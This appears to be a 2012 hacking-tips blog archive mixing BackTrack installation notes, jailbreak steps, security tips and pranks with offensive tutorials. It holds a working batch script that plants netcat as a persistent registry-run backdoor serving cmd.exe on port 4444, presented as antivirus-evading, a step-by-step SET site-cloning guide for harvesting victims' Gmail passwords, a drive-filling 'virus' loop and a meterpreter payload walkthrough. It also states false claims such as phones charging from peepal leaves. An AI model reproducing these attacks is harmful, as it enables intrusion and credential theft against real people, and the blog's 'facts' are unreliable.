Thursday, May 31, 2012

Backtrack | How to INSTALL BackTrack5



For hackers who wants to do penetration testing or some extra in hacking den Backtrack5 is a good choice...

First u need to download backtrack5 from this link-->> http://www.backtrack-linux.org/downloads/ 
nd also download UNetbootin which is required--> http://unetbootin.sourceforge.net/ 

Now requirement :
1. USB (Flash Drive) (Minimum USB Drive capacity 4 GB)
2. Backtrack 5 ISO file, md5sum verified(which is available on above link)
3. UNetbootin

now procedure to burn your USB.
> Plug in ur USB Drive
> Format the USB drive to FAT32
> Start Unetbootin and select the "diskimage" option, choose a BackTrack 5 ISO file which u've downloaded at d first of dis tutorial.
> Select the amount of space to use for persistence in MB
> Select your USB drive and click "OK" for creating a bootable BackTrack USB drive
> Once rebooted, remember that the default username and password are root/toor.

**now ur USB is ready to install BackTrack5...

first of all Boot the Backtrack Live Environment.
now at the bash prompt, type startx to enter the GUI.
Double click the install Backtrack.sh which u can see on d Desktop.

**now step by step Installation process...
Select the language and click on the forward button.
Select ur geographical location and time zone den click on the forward button.
Choose ur keyboard layout, or leave default.
now in d next screen choose the "Erase and use the entire disk" option and click Forward.
d next screen will show you the installation options, make sure everything is fine den click on forward button to start installation process.
when installation will finish u'll need to press the restart button and than enjoy Backtrack5.

NOTE : default user name is : root nd pass : toor


Dont forget to change it...
u can also use BackTrack 5 wid diff operating systems like Win XP, Win 7,etc wid dual boot setup.

Wednesday, May 30, 2012

How to Convert iOS 5.1.1 Tethered Jailbreak to Untethered Jailbreak Using Rocky Racoon 5.1.1 Untether



Rocky Racoon 5.1.1 Untether jailbreak on Cydia, which allows users who have a tethered jailbroken iOS device on iOS 5.1.1 to convert it into untethered jailbreak 

Rocky Racoon is the underlying untethered jailbreak that will be installed by popular jailbreak tools such as redsn0w and absinthe... if you are using 5.1.1 and you can reboot your device and have it still jailbroken, you have Rocky Racoon.

 If your device relies on Rocky Racoon on untethering, which includes any iPad 2, iPad 3 or iPhone 4S running 5.1.1., uninstalling this package will unjailbreak your device.

So if you've a tethered jailbroken iOS device on iOS 5.1.1 then you can follow these simple steps to convert it into an untethered jailbreak.
  • Launch Cydia
  • Tap on the Search Tab
  • Then search for Rocky Racoon
  • Select Rocky Racoon 5.1.1 Untether from the search results
  • Then tap on the Install button, followed by the Confirm button
  • After it is successfully installed, reboot your device.
If your iOS device reboots without having perform a tethered boot then you've successfully converted your jailbroken device to an untethered jailbreak using Rocky Racoon...



Monday, May 28, 2012

HOW TO HACK GMAIL AND FACEBOOK WITH BACKTRACK 5



Requirement ::

Backtrack 5

Open Backtrack,
Type ifconfig to check IP

Now Again Open Your Backtrack terminal and Type cd /pentest/exploits/set

Now Open Social Engineering Toolkit (SET) ./ set
Choose option 2, “Website Attack Vectors”

Choose option 4, “Tabnabbing Attack Method”.

Choose option 2, "Site Cloner"

Enter the URL of the site you want to clone. In this case gmail(type url) and hit enter.

Now send your IP to victim and when victim open IP is browser a fake Gmail page start working and when user input Username and Password in fake page. The Username and Password displayed on SET.

Hope you like the tutorial..

Saturday, May 26, 2012

How to Create a FUD Backdoor – Bypass An Antivirus


  1. Create a batch file that will add your Netcat into the system folder and can edit the registry of the windows. Wait you don’t need to create it because I did it for you.

@echo off
copy rcat.exe %systemroot%\system32\rcat.exe
if errorlevel 0 goto regedit
goto error
:regedit
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /f /v nc /d "%systemroot%\system32\rcat.exe -L -d -p 4444 -t -e cmd.exe"
if errorlevel 0 goto ip
:error
echo something wrong with the program.
goto end
:ip
echo write down the IP address from the table
ipconfig
:end
echo end.
nc -L -p 4444 -t

  • Open a notepad and than save it to name.bat
  • Download rcat and then copy rcat.exe into the same directory where name.bat exist
  • Now we use winrar to combine these two file, select both and then right click on add to archive

Friday, May 25, 2012

List Proxy Sites .com - Free Proxies 2012



Find Fresh New Proxy Sites For Unblocking Websities


Code to create a infinite folder in a drive | Pranks


Hi newbie Programmers, this batch code will very helpful for you.  This is simple and effective virus code.

As usual open notepad.
Copy this code to Notepad.

@echo off
:top
md %random%
goto top

Man-in-the-middle attack


The man-in-the-middle attack (often abbreviated MITM, also known as a bucket brigade attack, or sometimes Janus attack) in cryptography and computer security is a form of active eavesdropping in which the attacker makes independent connections with the victims and relays messages between them, making them believe that they are talking directly to each other over a private connection, when in fact the entire conversation is controlled by the attacker. The attacker must be able to intercept all messages going between the two victims and inject new ones, which is straightforward in many circumstances (for example, an attacker within reception range of an unencrypted Wi-Fi wireless access point, can insert himself as a man-in-the-middle).

A man-in-the-middle attack can succeed only when the attacker can impersonate each endpoint to the satisfaction of the other—it is an attack on (or lack of) mutual authentication. Most cryptographic protocols include some form of endpoint authentication specifically to prevent MITM attacks. For example, SSL can authenticate one or both parties using a mutually trusted certification authority.
Contents

Need for additional transfer over a secure channel

With the exception of Interlock Protocol, all cryptographic systems that are secure against MITM attacks require an additional exchange or transmission of information over some kind of secure channel. Many key agreement methods have been developed, with different security requirements for the secure channel.[citation needed]

Example of an attack=

Illustration of man-in-the-middle attack.

Suppose Alice wishes to communicate with Bob. Meanwhile, Mallory wishes to intercept the conversation to eavesdrop and possibly deliver a false message to Bob.

First, Alice asks Bob for his public key. If Bob sends his public key to Alice, but Mallory is able to intercept it, a man-in-the-middle attack can begin. Mallory sends a forged message to Alice that claims to be from Bob, but instead includes Mallory's public key.

Buzzcity Advertisement Loophole



BuzzCity loophole which publishers are utilizing to make money. Inept system of advertising publishing and fraud detection by the advertiser..

Recently BuzzCity - A mobile publishing and advertising agent, junked its server-to-server request based advertising system. This move by BuzzCity had already been speculated by mobile industry stalwarts as BuzzCity was achieving immense success and profits from its banner advertising (mostly in an deceiving manner). Such a move now allows them to steal loads of traffic from innocent publishers. When no AD shows up for the banner system, traffic gets diverted to its MyGamma Social Portal and this same traffic is resold by BuzzCity to potential advertisers, thus effectively degrading mobile traffic value.

Thursday, May 24, 2012

Secrets of free UC Web Mobile Browser



All mobile web enthusiasts, at some point of time have come across a certain mobile web browser called UCWEb. Typically UC Web stands for You Can Web (you can browse internet). UC Web is a browser created by a Chinese Software Corporation. It claims itself to be the dominant and most used browser within the Chinese community, and most probably it is a market leader there as it is one of the few rare browsers who have the functionality (language support) for Chinese people. Since it is a known fact that Android (CN version) is the most preferred operating system for Chinese mobile phones (courtesy to the opensource nature of Android), UC Web s strong support for the Android platform has made it a more dearer mobile web browser. This article will try to speculate over the hidden agenda behind this free to download, free to install and free to use browser.

What is an IFrame Injection? Mass IFrame Attack Tutorial


What is an IFrame Injection? Using IFrame tag, The Attackers injects the malware contain website(links) using Cross site Scripting in popular websites. So if the usual visitors of that popular sites opens the website, it will redirect to malware contain website. Malware will be loaded to your computer, now you are infected

What is IFrame Tag? <Iframe> tag stands for Inline Frame. It is used to insert contents from another website or server. That can be useful for building online applications.

Monday, May 14, 2012

How to Protect Your WordPress Blog From Being Hacked


Plugins are one of the main attracting core to wordpress rather than Blogger.. It makes job easy for you..

I recommend Wordfence plugin for your safety. Here are some of its features.

*. Scans your core files against a reference copy which you maintain in your cloud servers.
*. Lets you see what has changed, how the file has changed and even repair it.
*. Scans your comments, posts and all files including core, themes, plugins and everything else under your WordPress root directory for malware, virus signatures, vulnerabilities
and (very importantly) URL’s that are known to host malware or viruses.
*. Wordfence keeps known dangerous URL’s, including ALL URL’s that are on Googles’ safe browsing list, out of your comments, pages, posts and files. This is by far my favorite feature because it’s virtually gauranteed to keep you off the dreaded red-page-of-death-malware-list that Chrome and Google use to ban sites.
*. Wordfence comes with a complete firewall that lets youset up rules based on the type of traffic and either throttle orblock offenders with an SEO safe 503 (come back later) HTTP message.
*. Another favorite feature of mine is that you can block fake Google crawlers. I actually added this after I tested Wordfence on this site because I couldn’t believe how many scrapers were pretending to be Googlebot. So now they are all instantly blocked.
*. Wordfence uses Google’s recommended reverse-forward DNS verification to sift the fake Googlebots from the real ones.
*. It includes login security against every form of brute force attack out there including abusing your lost-password form.
*. And what’s the point of having all this awesome security if you can’t see who is visiting, who’s getting blocked and what humans and robots are doing? So Wordfence includes real-time traffic that wait..for…it…

Friday, May 11, 2012

READ SCRATCHED CD USING BADCOPY WITH KEY


Having problem with scratch cd Computer Getting hanged when a scracth CD is inserted Having inportant data on CD which become unreadable due to schratches We have came up with the solution .
Use BADCOPY software which allows you to recover data from a scratch unreadable CD. Bad Copy allows you to store the the data from CD with out your computer getting hang. It will allow to view all the files and folders. Just insert CD and open BAD COPY it will show you all the Content of your CD Just select the important files and start rescue it will take some time but will then as you to save the content,just give the path and the important file will get saved.

25 Most Surprising Computer-Internet-Virus Facts

Here is a collection of 25 Most Interesting Computer Facts about Funny Computer & Internet facts. Just Have a Look, & you will sure get Surprised

The Surprising Facts are :
1. Another name for a Microsoft Windows tutorial is ‘Crash Course’!
2. Bill Gates house was designed using a Macintosh computer .
3. 80% of all pictures on the internet are of naked women
4. By the year 2012 there will be approximately 17 billion devices connected to the Internet.
5. Domain names are being registered at a rate of more than one million names every month.
6. E-mail has been around longer than the World Wide Web.
7. For every ‘normal’ webpage, there are five porn pages .
8. In the 1980s, an IBM computer wasn’t considered 100% compatible unless it could run Microsoft Flight Simulator .
9. MySpace reports over 110 million registered users. Were ita country, it would be the tenth largest, just behind Mexico.
10. One of every 8 married couples in the US last year met online.
11. The average 21 year old has spent 5,000 hours playing video games, has exchanged 250,000 e-mails, instant and text messages and has spent 10,000 hours on the mobile phone.
12. The average computer user blinks 7 times a minute, less than half the normal rate of 20.
13. The first banner advertising was used in 1994.
14. The first computer mouse was invented by Doug Engelbart in around 1964 and was made of wood.
15. The first domain name ever registered was Symbolics.com.
16. The world’s first computer, called the Z1 , was invented by Konrad Zuse in 1936. His next invention, the Z2 was finished in 1939 and was the first fully functioning electro-mechanical computer.
17. There are approximately 1,319,872,109 people on the Internet.
18. There are approximately 1.06 billion instant messaging accounts worldwide.
19. While it took the radio 38 years, and the television a short 13 years, it took the World WideWeb only 4 years to reach 50 million users .

BSNL Official Balance Transfer trick

BSNL has recently changed their portal numbers so that we can’t access some services as we previously use. As a result their official balance transfer trick has also changed.

Register for PTOP-

STEP 1 -
Register for PTOP by sending
“register ptop” to 54455.
STEP 2 -
After registering you will get a password.
STEP 3 -
For balance transfer you have to send
GIFT(space)friends no.(space)amount(space)passward
to 54455
EXAMPLE – GIFT 9400082099 259
99990 to 54455
STEP 4 -
Now you will receive a SMS confirmation of the transfer.

Friday, May 04, 2012

Auto Hide IP Full


Did you know your IP address is exposed every time you visit a website? Your IP address is your online identity and could be used by hackers to break into your computer, steal personal information, or commit other crimes against you. Auto Hide IP allows you to surf anonymously, change your IP address, prevent identity theft, and guard against hacker intrusions, all with the click of a button. Auto Hide IP is privacy-protect
ion software which enables you to conceal your real IP address, surf anonymously, and automatically change your IP address every few minutes.

With it, you can select fake IP from different countries via “Choose IP Country” option and can Check IP directly. Using it, you are able to conceal your identity online by showing them a fake IP, blocking hackers and prying eyes from knowing your true location or identity. You can also choose “Launch on Startup” and then it will run and load a fake IP automatically when you log on to Windows. Besides, you can easily switch between fake IP and real IP by simply clicking a button of Hide IP or Stop Hide.

Encrypt Your USB Drive with TrueCrypt


Sharing your personal data with your friends by flash/USB drives is by far the most effective and efficient way of data transferring. USB drives of today all available in all shape and sizes some are large – nail like, while majority is in small compact size. But, due to its small size, its also vulnerable to get stolen or misplaced. If it ever gets stolen, you are at a risk of revealing all your personal information available in the USB to who ever stole it.

LATEST ANDROID MOBILE TRICKS | SECRET CODES FOR ANDROID MOBILE


Latest Android Mobile tricks 2011:
Cell Battery, WiFi Usage etc Info *#*#4636#*#*
Restore Factory Settings
*#*#7780#*#*
Format Phone
*2767*3855#
Launch service mode *#*#197328640#*
#*
Test WiFi
*#*#232339#*#* or
*#*#526#*#* or
*#*#528#*#*

Thursday, May 03, 2012

Hack your friend by using BackTrack 5 | Backtrack 5 tutorial

BackTrack 4 is an penetration testing tool that is run as an live CD , it is an modded form of Linx(Ubuntu) that can be used for hacking.In this tutorial I will show you how to generate payloads in it.



WARNING !!!!!!!!!!!!!! THIS HAS BEEN DISCUSSED TO TELL YOU ABOUT THE WAYS IN WHICH YOUR COMPUTER MIGHT BE EXPLIOTED !!!! DO NOT USE THIS ON ANYONE ELSE OTHER THAN YOURSELF !

In this tutorial we will be using a useful tool on Backtrack 4 to create a payload which we will then send a slave, the payload created is in exe, once the slave is Social Engineered into running the payload, A meterpreter session will appear to us. We will set it up with a listener on a port, meaning we will have a shell prompt open, waiting for a connection from the slave, once this occurs we have a session, and entry to the victims machine.

Charge Your Mobile Without Charger


You can charge your mobile phone without a charger. You just need a green leaf of peepal tree and after some time your mobile phone does get charged. If your mobile has been discharged and you are in a forest and have no charger on you, do not worry. You Should take two peepal leaves and you will be able to charge your cell phone

It is very good concept and easy to charge your mobile. You just have to open your mobile battery and connect it with peepal leaf. After that without shaking mobile set, you should set the battery in your mobile set. After some time your mobile would be charged. Residents of Chitrakoot conducted an experiment on this and became successful at their venture. Now many people in jungle or forests charge their cell phone through peepal leaves.

Disable Internet Cafe Timer


Note:Use This Software At Your Responsibility

Wednesday, May 02, 2012

Free Download Norton Antivirus 2012 Free For 6 Months



Hello Friends,
Norton Antivirus Gives Free Trial For Six Months Without Entering Any License Key.

Norton Claims The Antivirus Will Be Quick In Detecting
And Elimination Of Viruses.
Auto Protect Feature Gives Comprehensive Real Time Protection,
Working Silently In The Background.

1] Visit Norton Promotion Web Page And Click Start Download Button
To Download Norton Download Manager Client.
2] Click Norton Download Manager Client To Let It Download.
Antivirus Size:- 106.48 MB
3] Complete The Installations By Entering
Your E-Mail Id, Password And Other Details.

Install Google Chrome in Backtrack 5



Many people are questioning how to install Google chrome in backtrack.
This time I will tell you how to install Google chrome in backtrack 5. Follow the steps below :
1. apt-get install chromium-browser
You can also use synaptic and select the chromium-browser.
2. cd /usr/lib/chromium-browser

Drive “Access Is Denied” Message Solution


Drive “Access is denied” message?

start>Run=type(“CMD&quot; without ” “) enter.

follow these
1. go to C:\ by typing C:\>cd c:\
2. type C:\>attrib -S -H -R autorun.inf
3. delete the file by typing C:\>del autorun.inf
4. goto drive D: by typing C:\>d:

Useful Run Commands For Windows XP


Here is a list of commands that you can run off from the Run Command prompt in XP:

Program Run Command

Accessibility Controls = access.cpl
Accessibility Wizard = accwiz
Add Hardware Wizard = hdwwiz.cpl
Add/Remove Programs = appwiz.cpl
Administrative Tools = control admintools
Adobe Acrobat ( if installed ) = acrobat
Adobe Distiller ( if installed ) = acrodist
Adobe ImageReady ( if installed ) = imageready
Adobe Photoshop ( if installed ) = photoshop
Automatic Updates = wuaucpl.cpl
Basic Media Player = mplay32
Bluetooth Transfer Wizard = fsquirt

Calculator = calc
Ccleaner ( if installed ) = ccleaner
C: Drive = c:
Certificate Manager = cdrtmgr.msc
Character Map = charmap
Check Disk Utility = chkdsk
Clipboard Viewer = clipbrd
Command Prompt = cmd
Command Prompt = command
Component Services = dcomcnfg
Computer Management = compmgmt.msc
Compare Files = comp
Control Panel = control
Create a shared folder Wizard = shrpubw

CONFIGURE IP ADDRESS IN BACKTRACK


Labels: Linux |

BackTrack is the very famous Live CD Linux Distribution, and it is use for Penetration testing and it has wide range of security tools, to connect BackTrack computer with the network you have to configure IP address on the LAN Interface

 
Design by Secure Hackers